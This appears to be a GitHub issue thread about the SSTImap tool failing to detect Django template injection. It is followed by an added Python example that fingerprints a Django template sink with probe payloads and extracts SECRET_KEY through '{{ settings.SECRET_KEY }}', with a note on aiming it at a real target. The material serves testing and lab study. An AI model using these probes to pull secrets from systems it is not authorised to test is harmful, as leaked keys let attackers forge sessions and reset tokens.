
Django template injection

Open sectroyer opened this issue 2 years ago • 2 comments

It looks like SSTImap is not able to detect Django template injection, like in PortSwigger's "Server-side template injection with information disclosure via user-supplied objects" lab.

sectroyer · May 18 '23 16:05

Django template engine lacks exploitable execution capabilities, so exploiting it is different from other engines and focuses more on extracting variables. I might add support in the future.

vladko312 · May 20 '23 07:05

Yes, but detection would be nice, at least to know that "something is up" :) Also you can print an "info" that it's "worth checking" stuff like debug or secret key :) Usually that's enough to report the issue to the client.

sectroyer · May 25 '23 15:05
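The two points the thread raises, detecting that a Django sink interprets template syntax at all and then pulling variables such as SECRET_KEY out of the context, as an added example that is not SSTImap's code nor part of the original issue. It assumes Django is installed; the vulnerable view, the hardened view, the probe payloads, the marker strings and the SECRET_KEY value are all constructed for the demo. The probes exploit the difference vladko312 describes: Django's template language evaluates filters (`{{ 7|add:7 }}` gives `14`) but rejects arithmetic (`{{ 7*7 }}` is a syntax error, while Jinja2/Twig/Mako would print `49`), so a sink that passes the first probe and fails the second is Django-like even though there is no code execution to confirm it with.

```python
"""Fingerprint a Django template sink for SSTI and pull variables out of its context.

Added example, not SSTImap's code. Assumes Django is installed (pip install django);
the vulnerable view, the hardened view and the SECRET_KEY below are constructed for the demo.
"""
import re

try:
    import django
    from django.conf import settings
except ImportError:  # Django is an assumption of this example
    django = settings = None

FAKE_SECRET_KEY = "constructed0secret0key0for0the0demo"  # constructed, not a real key
MARK_START, MARK_END = "sstiStart", "sstiEnd"  # markers isolate probe output in the page

# Probes chosen to tell Django's template language apart from engines with arithmetic.
PROBES = {
    "add_filter": "{{ 7|add:7 }}",              # Django's add filter -> "14"
    "arithmetic": "{{ 7*7 }}",                  # "49" in Jinja2/Twig/Mako; a syntax error in Django
    "secret_key": "{{ settings.SECRET_KEY }}",  # leaks once a settings object is in the context
}


def _django_template():
    """Configure Django once (standalone, no project) and return the Template API."""
    if django is None:
        raise RuntimeError("this example needs Django: pip install django")
    if not settings.configured:
        settings.configure(
            DEBUG=True,
            SECRET_KEY=FAKE_SECRET_KEY,
            TEMPLATES=[{"BACKEND": "django.template.backends.django.DjangoTemplates"}],
        )
        django.setup()
    from django.template import Context, Template, TemplateSyntaxError
    return Context, Template, TemplateSyntaxError


def vulnerable_render(user_input):
    """Constructed vulnerable view: user input is compiled as template source and the
    project's settings object sits in the context (the shape of the PortSwigger lab)."""
    Context, Template, TemplateSyntaxError = _django_template()
    try:
        return Template("Hello " + user_input).render(Context({"settings": settings}))
    except TemplateSyntaxError as exc:  # e.g. "Could not parse the remainder" for {{ 7*7 }}
        return "TemplateSyntaxError: %s" % exc


def safe_render(user_input):
    """Hardened view: fixed template source, user input only ever a context variable."""
    Context, Template, _ = _django_template()
    return Template("Hello {{ name }}").render(Context({"name": user_input}))


def probe_result(render, probe):
    """Wrap a probe in markers, send it, and return what the engine put between them
    (None when the probe came back untouched or produced nothing)."""
    page = render(MARK_START + probe + MARK_END)
    m = re.search(re.escape(MARK_START) + "(.*?)" + re.escape(MARK_END), page, re.S)
    if not m or m.group(1) == probe or not m.group(1).strip():
        return None
    return m.group(1)


def fingerprint(render):
    """Run all probes through `render` and classify the sink."""
    out = {name: probe_result(render, p) for name, p in PROBES.items()}
    if out["add_filter"] == "14" and out["arithmetic"] != "49":
        engine = "django"   # filters work, arithmetic does not: Django's template language
    elif out["arithmetic"] == "49":
        engine = "other"    # arithmetic evaluated: Jinja2/Twig/Mako-style engine, not Django
    else:
        engine = "none"     # nothing was interpreted
    return {"engine": engine, "secret_key": out["secret_key"], "raw": out}


if __name__ == "__main__":
    for name, render in (("vulnerable", vulnerable_render), ("hardened", safe_render)):
        result = fingerprint(render)
        print("%s view: engine=%s secret_key=%r" % (name, result["engine"], result["secret_key"]))
```

Against a real target, `render` would be a function that submits the payload in the injectable parameter and returns the response body; the markers are what let the extraction step survive surrounding page content. A leaked SECRET_KEY is a reportable finding on its own, since it signs Django's session cookies and password-reset tokens.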